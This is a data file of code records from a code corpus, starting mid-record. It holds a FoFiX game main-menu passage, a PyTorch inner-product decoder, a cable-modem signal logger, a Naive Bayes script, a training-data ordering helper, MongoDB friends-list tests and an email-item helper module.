exists = 0\r\n #neck fallback to random if doesn't exist.\r\n try:\r\n # evilynux - first assume the chosenNeck contains the full filename\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",self.chosenNeck+\".png\"))\r\n except IOError:\r\n try:\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",\"Neck_\"+self.chosenNeck+\".png\"))\r\n except IOError:\r\n pass\r\n else:\r\n exists = 1\r\n else:\r\n exists = 1\r\n #MFH - fallback logic now supports a couple valid default neck filenames\r\n #MFH - check for Neck_1\r\n if exists == 0:\r\n try:\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",\"Neck_1.png\"))\r\n except IOError:\r\n pass\r\n else:\r\n Config.set(\"game\", \"default_neck\", \"1\")\r\n Log.warn(\"Default chosen neck not valid; fallback Neck_1.png forced.\")\r\n exists = 1\r\n #MFH - check for defaultneck\r\n if exists == 0:\r\n try:\r\n engine.loadImgDrawing(self, \"ok\", os.path.join(\"necks\",\"defaultneck.png\"))\r\n except IOError: #we don't really need to be accepting this except... ...yea, sorry.\r\n raise IOError(\"Default chosen neck not valid; fallbacks Neck_1.png and defaultneck.png also not valid!\")\r\n else:\r\n Log.warn(\"Default chosen neck not valid; fallback defaultneck.png forced.\")\r\n Config.set(\"game\", \"default_neck\", \"defaultneck\")\r\n\n def settingsMenu(self):\r\n if self.engine.advSettings:\r\n self.settingsMenuObject = Settings.SettingsMenu(self.engine)\r\n else:\r\n self.settingsMenuObject = Settings.BasicSettingsMenu(self.engine)\r\n return self.settingsMenuObject\r\n\r\n def shown(self):\r\n self.engine.view.pushLayer(self.menu)\r\n self.engine.stopServer()\r\n shaders.checkIfEnabled()\r\n if not self.shownOnce:\n self.shownOnce = True\n if hasattr(sys, 'frozen'):\n #stump: Check whether this is a non-svn binary being run from an svn working copy.\n if os.path.isdir(os.path.join('src', '.svn')) and 'development' not in Version.version():\n Dialogs.showMessage(self.engine, _('This binary release is being run from a Subversion working copy. This is not the correct way to run FoFiX from Subversion. Please see one of the following web pages to set your Subversion working copy up correctly:') +\n '\\n\\nhttp://code.google.com/p/fofix/wiki/RunningUnderPython26' +\n '\\nhttp://code.google.com/p/fofix/wiki/RequiredSourceModules')\n #stump: Check whether this is an svn binary not being run from an svn working copy\n elif not os.path.isdir(os.path.join('src', '.svn')) and 'development' in Version.version():\n Dialogs.showMessage(self.engine, _('This binary was built from a Subversion working copy but is not running from one. The FoFiX Team will not provide any support whatsoever for this binary. 
Please see the following site for official binary releases:') +\n '\\n\\nhttp://code.google.com/p/fofix/')\n\n def runMusic(self):\r\n if not self.song.isPlaying(): #re-randomize\r\n if self.files:\r\n i = random.randint(0,len(self.files)-1)\r\n filename = self.files[i]\r\n sound = os.path.join(\"themes\",self.themename,\"sounds\",filename)\r\n self.menumusic = True\r\n self.engine.menuMusic = True\r\n \r\n #self.song = Audio.Sound(self.engine.resource.fileName(sound))\r\n self.song = Audio.Sound(self.engine.resource.fileName(sound))\r\n self.song.setVolume(self.engine.config.get(\"audio\", \"menu_volume\"))\r\n #self.song.play(-1)\r\n self.song.play() #no loop\r\n else:\r\n self.menumusic = False\r\n self.engine.menuMusic = False\r\n \r\n def setMenuVolume(self):\r\n if self.menumusic and self.song.isPlaying():\r\n self.song.setVolume(self.engine.config.get(\"audio\", \"menu_volume\"))\r\n \r\n def cutMusic(self):\r\n if self.menumusic:\r\n if self.song and not self.engine.menuMusic:\r\n self.song.fadeout(1400)\r\n \r\n def hidden(self):\r\n self.engine.view.popLayer(self.menu)\r\n self.cutMusic()\r\n if self.nextLayer:\r\n self.engine.view.pushLayer(self.nextLayer())\r\n self.nextLayer = None\r\n else:\r\n self.engine.quit()\r\n\r\n def quit(self):\r\n self.engine.view.popLayer(self.menu)\r\n\r\n def catchErrors(function):\r\n def harness(self, *args, **kwargs):\r\n try:\r\n try:\r\n function(self, *args, **kwargs)\r\n except:\r\n import traceback\r\n Log.error(\"Traceback:\" + traceback.format_exc() )\r\n traceback.print_exc()\r\n raise\r\n except socket.error as e:\r\n Dialogs.showMessage(self.engine, str(e[1]))\r\n except KeyboardInterrupt:\r\n pass\r\n except Exception as e:\r\n #MFH - enhancing error trapping and locating logic\r\n if e:\r\n Dialogs.showMessage(self.engine, str(e))\r\n return harness\r\n\r\n def launchLayer(self, layerFunc):\r\n if not self.nextLayer:\r\n self.nextLayer = layerFunc\r\n self.engine.view.popAllLayers()\r\n #launchLayer = catchErrors(launchLayer) #MFH - trying to catch errors\r\n\r\n def showTutorial(self):\r\n # evilynux - Make sure tutorial exists before launching\r\n #tutorialpath = self.engine.getPath(os.path.join(\"songs\",\"tutorial\"))\r\n tutorialpath = self.engine.tutorialFolder\r\n if not os.path.isdir(self.engine.resource.fileName(tutorialpath)):\r\n Log.debug(\"No folder found: %s\" % tutorialpath)\r\n Dialogs.showMessage(self.engine, _(\"No tutorials found!\"))\r\n return\r\n\r\n if self.engine.isServerRunning():\r\n return\r\n\r\n players = Dialogs.activateControllers(self.engine, 1) #akedrou\r\n if players == 0:\r\n return\r\n \r\n Config.set(\"game\",\"game_mode\", 0) #MFH - ensure tutorial can work with new logic that depends on this mode variable\r\n Config.set(\"game\",\"multiplayer_mode\", 0) #MFH - ensure tutorial can work with new logic that depends on this mode variable\r\n Config.set(\"game\", \"players\", 1)\r\n Config.set(\"game\", \"tut\", True)\r\n \r\n #Config.set(\"game\",\"game_mode\", 1) #MFH - don't force practice mode.... 
this is problematic.\r\n\r\n self.engine.startServer()\r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(\"127.0.0.1\"), synch = True)\r\n\r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session, singlePlayer = True))\r\n showTutorial = catchErrors(showTutorial)\r\n\r\n #MFH: adding deprecated support for EOF's method of quickstarting a song to test it\r\n def newSinglePlayerGame(self):\r\n self.newLocalGame() #just call start function with default settings = 1p quickplay\r\n \r\n def newLocalGame(self, players=1, mode1p=0, mode2p=0, maxplayers = None, allowGuitar = True, allowDrum = True, allowMic = False): #mode1p=0(quickplay),1(practice),2(career) / mode2p=0(faceoff),1(profaceoff)\r\n self.engine.data.acceptSound.play()\r\n players = Dialogs.activateControllers(self.engine, players, maxplayers, allowGuitar, allowDrum, allowMic) #akedrou\r\n if players == 0:\r\n if self.engine.cmdPlay == 2:\r\n self.engine.cmdPlay = 0\r\n return\r\n Config.set(\"game\", \"players\", players)\r\n Config.set(\"game\",\"game_mode\", mode1p)\r\n Config.set(\"game\",\"multiplayer_mode\", mode2p)\r\n if Config.get(\"game\", \"tut\") == True:\r\n Config.set(\"game\", \"tut\", False)\r\n #Config.set(\"game\", \"selected_library\", \"\")\r\n #Config.set(\"game\", \"selected_song\", \"\")\r\n\r\n #MFH - testing new traceback logging:\r\n #raise TypeError\r\n\r\n if self.engine.isServerRunning():\r\n return\r\n self.engine.startServer()\r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(\"127.0.0.1\"), synch = True)\r\n \r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session, singlePlayer = True))\r\n newLocalGame = catchErrors(newLocalGame)\r\n\r\n def hostMultiplayerGame(self):\r\n self.engine.startServer()\r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(\"127.0.0.1\"))\r\n\r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session))\r\n hostMultiplayerGame = catchErrors(hostMultiplayerGame)\r\n\r\n def joinMultiplayerGame(self, address = None):\r\n if not address:\r\n address = Dialogs.getText(self.engine, _(\"Enter the server address:\"), \"127.0.0.1\")\r\n\r\n if not address:\r\n return\r\n \r\n self.engine.resource.load(self, \"session\", lambda: self.engine.connect(address))\r\n\r\n if Dialogs.showLoadingScreen(self.engine, lambda: self.session and self.session.isConnected, text = _(\"Connecting...\")):\r\n self.launchLayer(lambda: Lobby(self.engine, self.session))\r\n joinMultiplayerGame = catchErrors(joinMultiplayerGame)\r\n\r\n def startEditor(self):\r\n self.launchLayer(lambda: Editor(self.engine))\r\n startEditor = catchErrors(startEditor)\r\n\r\n def startImporter(self):\r\n self.launchLayer(lambda: Importer(self.engine))\r\n startImporter = catchErrors(startImporter)\r\n\r\n def startGHImporter(self):\r\n self.launchLayer(lambda: GHImporter(self.engine))\r\n startGHImporter = catchErrors(startGHImporter)\r\n \r\n def run(self, ticks):\r\n self.time += ticks / 50.0\r\n if self.engine.cmdPlay == 1:\r\n self.engine.cmdPlay = 4\r\n elif self.engine.cmdPlay == 4: #this frame runs the engine an extra loop to allow the font to load...\r\n #evilynux - improve cmdline support\r\n self.engine.cmdPlay = 2\r\n 
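# cmdPlay is a small state machine: 1 -> 4 runs one extra engine loop so the\r\n            # font can load, then 4 -> 2 here actually starts the requested game.\r\n            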
self.newLocalGame(players = Config.get(\"game\", \"players\"), mode1p = Config.get(\"game\",\"game_mode\"), mode2p = Config.get(\"game\",\"multiplayer_mode\"))\r\n elif self.engine.cmdPlay == 3:\r\n self.quit()\r\n \r\n \r\n if self.menumusic: #MFH \r\n self.runMusic()\r\n \r\n \r\n def render(self, visibility, topMost):\r\n self.engine.view.setViewport(1,0)\r\n self.visibility = visibility\r\n if self.rbmenu:\r\n v = 1.0 - ((1 - visibility) ** 2)\r\n else:\r\n v = 1\r\n if v == 1:\r\n self.engine.view.transitionTime = 1 \r\n\r\n if self.menu.active and not self.active:\r\n self.active = True\r\n\r\n \r\n t = old_div(self.time, 100)\r\n w, h, = self.engine.view.geometry[2:4]\r\n r = .5\r\n \r\n if not self.useSoloMenu:\r\n\r\n if self.active:\r\n if self.engine.view.topLayer() is not None:\r\n if self.optionsBG != None:\r\n self.engine.drawImage(self.optionsBG, (self.opt_bkg_size[2],-self.opt_bkg_size[3]), (w*self.opt_bkg_size[0],h*self.opt_bkg_size[1]), stretched = 3)\r\n \r\n self.engine.drawImage(self.optionsPanel, (0.5,-0.5), (w/1.7, old_div(h,2)))\r\n else:\r\n self.engine.drawImage(self.engine.data.loadingImage, (1.0,-1.0), (old_div(w,2), old_div(h,2)), stretched = 3)\r\n\r\n if self.menu.active and self.engine.cmdPlay == 0:\r\n if self.background != None:\r\n #MFH - auto-scaling\r\n self.engine.drawImage(self.background, (1.0,-1.0), (old_div(w,2), old_div(h,2)), stretched = 3)\r\n\r\n for i in range(0,6):\r\n #Item selected\r\n if self.menu.currentIndex == i:\r\n xpos = (.5,1)\r\n #Item unselected\r\n else:\r\n xpos = (0,.5)\r\n #which item?\r\n ypos = 1/6.0*i\r\n\r\n\r\n#============blazingamer============\r\n#if menux and/or menuy are not set it will use the default positions for the main text\r\n if self.menux == None or self.menuy == None:\r\n if self.theme == 0:\r\n textcoord = (w*0.5,h*0.45-(h*self.main_menu_vspacing)*i)\r\n elif self.theme == 1:\r\n textcoord = (w*0.7,h*0.8-(h*self.main_menu_vspacing)*i)\r\n#if menux and menuy are set it will use those\r\n else:\r\n try:\r\n textcoord = (w*self.menux,h*self.menuy-(h*self.main_menu_vspacing)*i)\r\n except Exception as e:\r\n Log.warn(\"Unable to translate BGText: %s\" % e) \r\n \r\n#=================================== \r\n\r\n self.engine.drawImage(self.BGText, (.5*self.main_menu_scale,-1/6.0*self.main_menu_scale), textcoord,\r\n rect = (xpos[0],xpos[1],ypos,ypos+1/6.0))\r\n\r\n else:\r\n\r\n if self.active:\r\n if self.engine.view.topLayer() is not None:\r\n if self.optionsBG != None:\r\n self.engine.drawImage(self.optionsBG, (self.opt_bkg_size[2],-self.opt_bkg_size[3]), (w*self.opt_bkg_size[0],h*self.opt_bkg_size[1]), stretched = 3)\r\n \r\n self.engine.drawImage(self.optionsPanel, (0.5,-0.5), (w*0.4, old_div(h,2)))\r\n else:\r\n self.engine.drawImage(self.engine.data.loadingImage, scale = (1.0,-1.0), coord = (old_div(w,2),old_div(h,2)), stretched = 3)\r\n \r\n if self.menu.active and self.engine.cmdPlay == 0:\r\n if self.background != None:\r\n self.engine.drawImage(self.background, (1.0,-1.0), (old_div(w,2), old_div(h,2)), stretched = 3)\r\n\r\n for i in range(0,5):\r\n #Item selected\r\n if self.menu.currentIndex == i:\r\n xpos = (.5,1)\r\n #Item unselected\r\n else:\r\n xpos = (0,.5)\r\n #which item?\r\n ypos = 1/5.0*i\r\n \r\n\r\n#============blazingamer============\r\n#if menux and/or menuy are not set it will use the default positions for the main text\r\n if self.menux == None or self.menuy == None:\r\n textcoord = (w*0.2,(h*0.8-(h*self.main_menu_vspacing)*i)*v)\r\n#if menux and menuy are set it will use those\r\n 
else:\r\n try:\r\n textcoord = (w*self.menux,(h*self.menuy-(h*self.main_menu_vspacing)*i)*v)\r\n except Exception as e:\r\n Log.warn(\"Unable to translate BGText: %s\" % e) \r\n \r\n#===================================\r\n\r\n self.engine.drawImage(self.BGText, (.5*self.main_menu_scale,(-1/5.0*self.main_menu_scale)),\r\n textcoord, rect = (xpos[0],xpos[1],ypos,ypos+1/5.0))\r\n\r\n#racer: added version tag to main menu:\r\n if self.version != None:\r\n wfactor = self.version.widthf(pixelw = 640.000)\r\n self.engine.drawImage(self.version, (0.5,-0.5),(w*Theme.versiontagposX, h*Theme.versiontagposY)) #worldrave - Added theme settings to control X+Y positions of versiontag.\r\n\r\n\r\n","sub_path":"MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":25352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418129870","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# author: chinshin\r\n# datetime: 2020/4/20 15:50\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass InnerProductDecoder(nn.Module):\r\n def __init__(self, input_dim: int, dropout: float = 0.0):\r\n super(InnerProductDecoder, self).__init__()\r\n self.dropout = nn.Dropout(dropout)\r\n self.act = torch.sigmoid\r\n self.criterion = nn.MSELoss()\r\n\r\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\r\n \"\"\"\r\n :param inputs: (batch_size, seq_len, hidden_size)\r\n :return: (seq_len * seq_len, )\r\n \"\"\"\r\n # temp_mask = (targets > 0).unsqueeze(1).repeat(1, targets.size(1), 1)\r\n # temp_mask_t = temp_mask.transpose(1, 2)\r\n # mask = temp_mask * temp_mask_t\r\n # lengths = [torch.sum(sub_mask[0]).item() for sub_mask in mask]\r\n inputs_row = inputs\r\n inputs_col = inputs.transpose(1, 2)\r\n inputs_row = self.dropout(inputs_row)\r\n inputs_col = self.dropout(inputs_col)\r\n rec = torch.bmm(inputs_row, inputs_col)\r\n outputs = self.act(rec)\r\n outputs = outputs.view(-1)\r\n return outputs\r\n # new_rec = []\r\n # new_targets = []\r\n # for length, single_rec, single_adj in zip(lengths, rec, adj):\r\n # new_rec.extend(single_rec[:length, :length].reshape(length * length, ))\r\n # new_targets.extend(single_adj[:length, :length].reshape(length * length, ))\r\n # new_rec = torch.tensor(new_rec)\r\n # new_targets = torch.tensor(new_targets)\r\n # new_rec = self.act(new_rec)\r\n # dec_loss = self.criterion(new_rec, new_targets)\r\n # return dec_loss","sub_path":"bert/model/decoder/inner_product.py","file_name":"inner_product.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284517656","text":"import re, itertools, urllib.request, datetime\nfrom bs4 import BeautifulSoup\n\n## set modem's IP Address\nip = 'http://192.168.100.1/cmSignalData.htm'\n\ndate = ('Data logged: {:%Y-%b-%d %H:%M:%S}'.format(datetime.datetime.now()))\n\n## adjust signal level tolerance - if not high set to 100\n\ndownstream_high = 15\ndownstream_low = -15\nupstream_high = 55\nupstream_low = 37\nsnr_high = 100\nsnr_low = 30\n\nclass Scraper:\n\n def set_data(target, start):\n for data in td[start:]:\n rawData = data.string\n finishedData = int(re.sub(\"[^-?\\d+(\\.\\d+)?$]\", \"\", rawData))\n target.append(finishedData)\n\n def get_average(data):\n average = sum(data[1:]) / len(data)\n return average\n\n def check_limits(results, high, low, target):\n for result in results[1:]:\n if result <= low:\n target.append(results[0] + ' ' + str(result) + ' dBmV -- WARNING 
TOO LOW MINIMUM LEVEL: ' + str(low))\n elif result >= high:\n target.append(results[0] + ' ' + str(result) + ' dB -- WARNING TOO HIGH MAXIMUM LEVEL: ' + str(high))\n else:\n target.append(results[0] + ' ' + str(result) + ' DBmV -- in spec')\n\n def get_errors(unerrored, uncorrected, corrected, store):\n percentage = unerrored / (unerrored + uncorrected + corrected)\n percentage = percentage * 100\n errors.append(str(percentage) + ' % Unerrored Codewords')\n\n def write_to_log(entries, title):\n with open(\"modem.log\", \"a\") as f:\n title = title\n f.write('-- ' + title + ' --\\n')\n for entry in entries:\n f.write('Channel ' + str(entry[1]) + ' : ' + str(entry[0]) + '\\n')\n f.write('--------------------------------------------\\n')\n\n\n\ntry:\n with urllib.request.urlopen(ip) as f:\n\n soup = BeautifulSoup(f, 'html.parser')\n tables = soup.findAll('table')\n\n snr = ['Signal to Noise Ratio']\n downstream = ['Downstream Signal']\n upstream = ['Upstream Signal']\n up_channels = ['Upstream Channel']\n down_channels = ['Downstream Channel']\n unerrored = ['Unerrored Codewords']\n correctable = ['Corrected']\n uncorrectable = ['Uncorrected']\n\n down = []\n up = []\n noise = []\n\n scraper = Scraper\n\n for table in tables:\n rows = table.findAll('tr')\n for tr in rows:\n td = tr.findAll('td')\n for data in td:\n check = data.string\n\n if check == 'Signal to Noise Ratio':\n scraper.set_data(snr, 1)\n\n elif data.has_attr('align'):\n scraper.set_data(downstream, 2)\n\n elif check == 'Power Level':\n scraper.set_data(upstream, 1)\n\n elif check == 'Channel ID':\n if len(td) == 9:\n if len(down_channels) < 5:\n scraper.set_data(down_channels, 1)\n print(down_channels)\n elif len(td) == 5:\n scraper.set_data(up_channels, 1)\n\n elif check == 'Total Unerrored Codewords':\n scraper.set_data(unerrored, 2)\n\n elif check == 'Total Correctable Codewords':\n scraper.set_data(correctable, 2)\n\n elif check == 'Total Uncorrectable Codewords':\n scraper.set_data(uncorrectable, 2)\n\n\n ##Check results are within specs then write to .log\n with open(\"modem.log\", \"a\") as f:\n f.write('--------------------------------------------\\n')\n f.write('--------------------------------------------\\n')\n f.write('-- ' + date + ' --\\n')\n f.write('--------------------------------------------\\n')\n f.write('--------------------------------------------\\n')\n\n scraper.check_limits(downstream, downstream_high, downstream_low, down)\n down = list(zip(down, down_channels[1:]))\n scraper.write_to_log(down, str(downstream[0]))\n\n\n scraper.check_limits(upstream, upstream_high, upstream_low, up)\n up = list(zip(up, up_channels[1:]))\n scraper.write_to_log(up, str(upstream[0]))\n\n\n scraper.check_limits(snr, snr_high, snr_low, noise)\n noise = list(zip(noise, down_channels[1:]))\n scraper.write_to_log(noise, str(snr[0]))\n\n unerrored = scraper.get_average(unerrored)\n correctable = scraper.get_average(correctable)\n uncorrectable = scraper.get_average(uncorrectable)\n\n errors= []\n scraper.get_errors(unerrored, correctable, uncorrectable, errors)\n with open(\"modem.log\", \"a\") as f:\n f.write('-- Error Correction --\\n')\n f.write(errors[0] + '\\n')\n f.write('--------------------------------------------\\n')\nexcept:\n with open(\"modem.log\", \"a\") as f:\n f.write('--------------------------------------------\\n')\n f.write('--Something went wrong ' + date + ' --\\n')\n 
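# the bare 'except' above hides the original error; logging traceback.format_exc()\n        # here would make failures easier to diagnose.\n        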
f.write('--------------------------------------------\\n')\n","sub_path":"surfboard_log.py","file_name":"surfboard_log.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526095919","text":"# This program read data from the CSV file and uses a Naive Bayes Multinomial model to \n# fit to the data and predic the results. Then tries to predict the results for the same \n# samples used for training and calculate the hit rate\nfrom readCSV import loadCSVFile\n\nX,Y = loadCSVFile('dataSnake.csv')\n\nfrom sklearn.naive_bayes import MultinomialNB \n\nmodel = MultinomialNB()\nmodel.fit(X, Y)\nresult = model.predict(X)\n\ndiferents = result - Y\nright = [d for d in diferents if d == 0]\n\nrightRate = 100*len(right)/len(X)\n\nprint(rightRate) ","sub_path":"ClassificationUsingCSV.py","file_name":"ClassificationUsingCSV.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574085120","text":"\"\"\"\nOrders training data to evenly distribute class coverage for each training fold.\n\nAuthor: Jake Lepere\nDate: 09/03/2018\n\"\"\"\nimport numpy as np\n\ndef order_input(images, masks, depths, num_folds=5, by='mask_count'):\n \"\"\"\n Evenly spreads out the input data to maximize class coverage for all training folds.\n\n Args:\n images: the images\n masks: the masks\n depths: the depths\n num_folds: the number of validation folds\n by: arrange by 'mask_count' or 'depth'\n \"\"\"\n\n # number of training examples\n num_examples = images.shape[0]\n\n # sort the data by weighting the mask and depth, where depth is the tie breaker if the mask sum is the same\n min_depth = np.amin(depths)\n max_depth = np.amax(depths)\n sorted_indexes = np.argsort([np.sum(masks[i]) + (depths[i] - min_depth)/(max_depth - min_depth) for i in range(num_examples)])\n\n # indexes after ordering\n ordered_indexes = []\n\n # order the indexes\n for i in range(num_folds):\n \n # starting index\n j = i\n\n # j = (i, i+num_folds, i+2*num_folds, i+3*num_fords, ...)\n while j < num_examples:\n \n # add index\n ordered_indexes.append(j)\n\n # increment\n j += num_folds\n\n # return ordered training data\n return images[ordered_indexes], masks[ordered_indexes], depths[ordered_indexes]\n\n","sub_path":"training_equalization.py","file_name":"training_equalization.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226151760","text":"__author__ = \"Chloe Parkes\"\n\nimport unittest2 as unittest\nfrom mock import patch\nfrom pymongo import MongoClient\n\nfrom userdetails import UserDetails\nfrom dbfriendslist import DBFriendsList as FriendsList\n\nclass DBFriendsListTest(unittest.TestCase):\n\n _connection_string = 'mongodb://localhost:27017/'\n\n def setUp(self):\n self.test_user = UserDetails(\"TestName\",\n \"TestUsername\",\n \"24/06/94\",\n \"SA1\",\n \"2000\",\n 1,\n 1)\n\n self.client = MongoClient(self._connection_string)\n self.db = self.client['mission']\n self.user_collection = self.db['user']\n\n\n @patch(\"dbuser.DBUser.validate_existing_user\")\n def test_add_to_friends_list(self, validate_existing_user):\n validate_existing_user.return_value = True\n friends_list = FriendsList()\n\n self._setup_tests()\n self.assertEqual(friends_list.add_to_friends_list(\"2000\", \"FriendThree\"), True)\n f = self.user_collection.find_one({'device_id': \"2000\"}, 
{'friends_list': 1})\n self.assertEqual(f['friends_list'], [\"FriendOne\", \"FriendTwo\", \"FriendThree\"])\n self._teardown_tests()\n\n validate_existing_user.return_value = False\n friends_list2 = FriendsList()\n self.assertEqual(friends_list2.add_to_friends_list(\"100\", \"FriendThree\"), False)\n\n def test_get_friends_list(self):\n friends_list = FriendsList()\n self._setup_tests()\n self.assertEqual(friends_list.get_friends_list(\"2000\"), [\"FriendOne\", \"FriendTwo\"])\n self._teardown_tests()\n\n self._setup_tests_no_friends_list()\n self.assertEqual(friends_list.get_friends_list(\"2000\"), [])\n self._teardown_tests()\n\n def _setup_tests(self):\n self.user_collection.insert_one({\"fname\": self.test_user.fname,\n \"username\": self.test_user.username,\n \"dob\": self.test_user.dob,\n \"post_area\": self.test_user.post_area,\n \"device_id\": self.test_user.device_id,\n \"x_pos\": 0,\n \"y_pos\": 0,\n \"friends_list\": [\"FriendOne\", \"FriendTwo\"]})\n\n def _setup_tests_no_friends_list(self):\n self.user_collection.insert_one({\"fname\": self.test_user.fname,\n \"username\": self.test_user.username,\n \"dob\": self.test_user.dob,\n \"post_area\": self.test_user.post_area,\n \"device_id\": self.test_user.device_id,\n \"x_pos\": 0,\n \"y_pos\": 0})\n\n def _teardown_tests(self):\n self.assertEqual(self.user_collection.remove({'device_id': self.test_user.device_id}), {'ok': 1, 'n': 1})\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"dbfriendslist_test.py","file_name":"dbfriendslist_test.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489451826","text":"from collections import OrderedDict\nimport json\nimport codecs\n\n\nclass MailItem(object):\n\n DOC_PLAIN = 'PLAINTEXT'\n DOC_HTML = 'HTML'\n DOC_MARKDOWN = 'MARKDOWN'\n DOC_RST = 'RESTRUCTUREDTEXT'\n\n def __init__(self, parent=None, **kwargs):\n self.parent = parent\n\n # Essential\n self.mail_to = []\n self.mail_subject = None\n self.mail_body = None\n\n # Optional\n self.mail_from = None\n self.mail_cc = []\n self.mail_bcc = []\n self.mail_signature = None\n self.mail_attachments = []\n self.mail_embedded = {}\n self.doctype = self.DOC_PLAIN\n\n def get_mailitem(self):\n return {\n \"to\": self.mail_to,\n \"cc\": self.mail_cc,\n \"bcc\": self.mail_bcc,\n \"subject\": self.mail_subject,\n \"body\": self.mail_body,\n \"signature\": self.mail_signature,\n \"attachments\": self.mail_attachments,\n \"embedded\": self.mail_embedded\n }\n\n def set_doctype(self, doctype):\n self.doctype = doctype\n\n def load(self, mailpath=None):\n mailfile = read_json_encoded(mailpath)\n return self.loads(**mailfile)\n\n def loads(self, **kwargs):\n \"\"\"Function reads a dictionary of mail attributes and sets the\n the corresponding MailItem object attributes.\n\n Usage:\n mi = MailItem()\n kwargs = {\n 'to': ['example@email.com'],\n 'subject': 'Test Email',\n 'body': 'Fred,

This is a test email.

',\n 'signature': 'From,
Bob'\n }\n mi.loads(**kwargs)\n\n Args:\n kwargs (dictionary): mail attributes (see below)\n\n Kwargs Keys:\n Required:\n to (list), subject (string), body (string)\n Optional:\n cc (list), bcc (list), signature (string), attachments (list),\n embedded (list)\n\n \"\"\"\n\n print('\\nEVENT: Loading JSON mail data file into MailItem...')\n try:\n if 'to' in kwargs:\n self.mail_to = kwargs['to']\n if 'from' in kwargs:\n self.mail_from = kwargs['from']\n if 'cc' in kwargs:\n self.mail_cc = kwargs['cc']\n if 'bcc' in kwargs:\n self.mail_bcc = kwargs['bcc']\n if 'subject' in kwargs:\n self.mail_subject = kwargs['subject']\n if 'body' in kwargs:\n self.mail_body = kwargs['body']\n if 'signature' in kwargs:\n self.mail_signature = kwargs['signature']\n if 'attachments' in kwargs:\n self.mail_attachments = kwargs['attachments']\n if 'embedded' in kwargs:\n self.mail_embedded = OrderedDict(\n sorted(kwargs['embedded'].items(), key=lambda x: x[1])\n )\n print(\n 'SUCCESS: MailItem loaded!'\n )\n return self\n except KeyError as e:\n print(\n '\\nERROR: A key error occured while '\n 'loading your MailItem.\\n\\t{}'.format(str(e))\n )\n except Exception as e:\n print(\n '\\nERROR: An unknown error occured while '\n 'loading your MailItem.\\n\\t{}'.format(str(e))\n )\n return None\n\n def is_loaded(self):\n \"\"\"Function checks to see if the minimal mail parts are set.\"\"\"\n essential = [\n self.mail_to, self.mail_subject, self.mail_body\n ]\n\n for item in essential:\n if not item:\n return False\n return True\n\n def format_doctype(self):\n doctype = self.doctype.upper()\n if doctype in [self.DOC_PLAIN, 'PT', 0]:\n self.mail_body = \"
\".join(self.mail_body.split('\\n'))\n self.mail_signature = \"
\".join(\n self.mail_signature.split('\\n')\n )\n elif doctype in [self.DOC_HTML, 1]:\n self.mail_body = \"\".join(self.mail_body.split('\\n'))\n self.mail_signature = \"\".join(self.mail_signature.split('\\n'))\n elif doctype in [self.DOC_MARKDOWN, 'MD', 2]:\n pass\n elif doctype in [self.DOC_RST, 'RST', 3]:\n pass\n\n def multi_replace(self, item, *args):\n for oplist in args:\n for tup in oplist:\n item = item.replace(tup[0], tup[1])\n\n def convert_string_to_JSON(self, instr):\n return json.loads(byteify(instr))\n\n def save_to_JSON(self, path=None):\n currmail = self.get_mailitem()\n\n if path:\n with codecs.open(str(path), 'w', encoding='utf8') as fp:\n json.dump(currmail, fp)\n\n def __repr__(self):\n return (\n 'MailItem(**{\"to\": %r, \"cc\": %r, \"bcc\": %r, '\n '\"subject\": %r, \"body\": %r, \"signature\": %r, '\n '\"attachments\": %r, \"embedded\": %r})' % (\n self.mail_to, self.mail_cc, self.mail_bcc, self.mail_subject,\n self.mail_body, self.mail_signature, self.mail_attachments,\n self.mail_embedded\n )\n )\n\n def __str__(self):\n return (\n 'MailItem Attributes:\\nto\\t\\t%s\\ncc\\t\\t%s\\nbcc\\t\\t%s\\n'\n 'subject\\t%s\\nbody\\t\\t%s\\nsignature\\t%s\\nattachments\\t%s\\n'\n 'embedded\\t%s\\n\\n' % (\n self.mail_to, self.mail_cc, self.mail_bcc, self.mail_subject,\n self.mail_body, self.mail_signature, self.mail_attachments,\n self.mail_embedded\n )\n )\n\n\ndef read_json(path):\n \"\"\"Function reads a JSON file and returns the contents of the file.\n\n Args:\n path (string): path to JSON file to read\n\n \"\"\"\n with open(path, 'r') as f:\n return json.load(f, object_pairs_hook=OrderedDict)\n\n\ndef read_json_encoded(path, encoding='utf8'):\n with codecs.open(path, 'r', encoding=encoding) as f:\n return json.load(f, object_pairs_hook=OrderedDict)\n\n\ndef read(path):\n \"\"\"Function reads a file and returns the contents of the file.\n\n Args:\n path (string): path to file to read\n\n \"\"\"\n with open(path) as f:\n return f.read()\n\n\ndef byteify(input):\n if isinstance(input, dict):\n return {\n byteify(key): byteify(value) for key, value in input.iteritems()\n }\n elif isinstance(input, list):\n return [byteify(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf8')\n else:\n return 